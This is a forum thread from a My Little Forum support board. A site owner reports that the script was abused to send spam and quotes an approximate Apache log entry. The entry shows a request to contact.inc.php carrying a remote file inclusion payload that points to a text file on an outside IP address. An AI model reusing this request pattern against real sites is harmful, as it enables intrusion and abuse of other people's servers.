Site with just MLF is sending out spam and host disabled me. (General)

by MLF User, Tuesday, March 26, 2013, 01:06 (4073 days ago) @ Auge

Hello

Hi, I have a site with nothing but MLF running on it and my site has been disabled due to my site sending out spam. I came to see if there was an updated version and it seems I have the latest version. After searching Google, I cant find a fix (though there are several other exploits out there with this version) and another forum saying their MLF has been disabled due to the script is sending out spam. Has anyone found a fix on how to stop this? Does anyone else know of a threaded forum like this that is more secure?


What is your forum configuration? Who can post in your forum (everyone or registered users)? Did your hoster tell you, wich function was abused (posting form, contact form)?

Tschö, Auge

Hi sorry about the delay.
I had it setup that only registered users could post.
HostGator finally got back with me and told me that MLF is known to be a vulnerable script and that it is not longer maintained by the developers. I had a friend look at some things before we shut down the account and he said the same time the spams were going out, the file /includes/contact.inc.php was getting hit by several IP addresses at the same time and the URL it was using was very weird. It was like
http://mydomain.com/includes/contact.inc.php//v//@//@//$admin/@/?http://218.69.248.24/hapy.txt

This isnt the exact URL that was shown in the apache logs but it was a bunch of slashes, @ signs, $admin, and they all ended with that ?http://218.69.248.24/hapy.txt

At the time he found this (the next day), we tried to bring up http://218.69.248.24/hapy.txt but it wouldnt load.

We left HostGator and went with a new host from his suggestion and now using a different forum, but we wanted one that had a tree view like the one this does, not the kind we're using now (SMF) since that's what our members wanted, it was like the old school UBB type of forum.

I asked him to come here and post what he knows, but it doesnt look like he has yet. The original admin of our forum is gravely ill and now it's just 3 of us taking it over and we're not quite sure what we are doing but this is as much info as I know and hope it helps.


Complete thread:

 RSS Feed of thread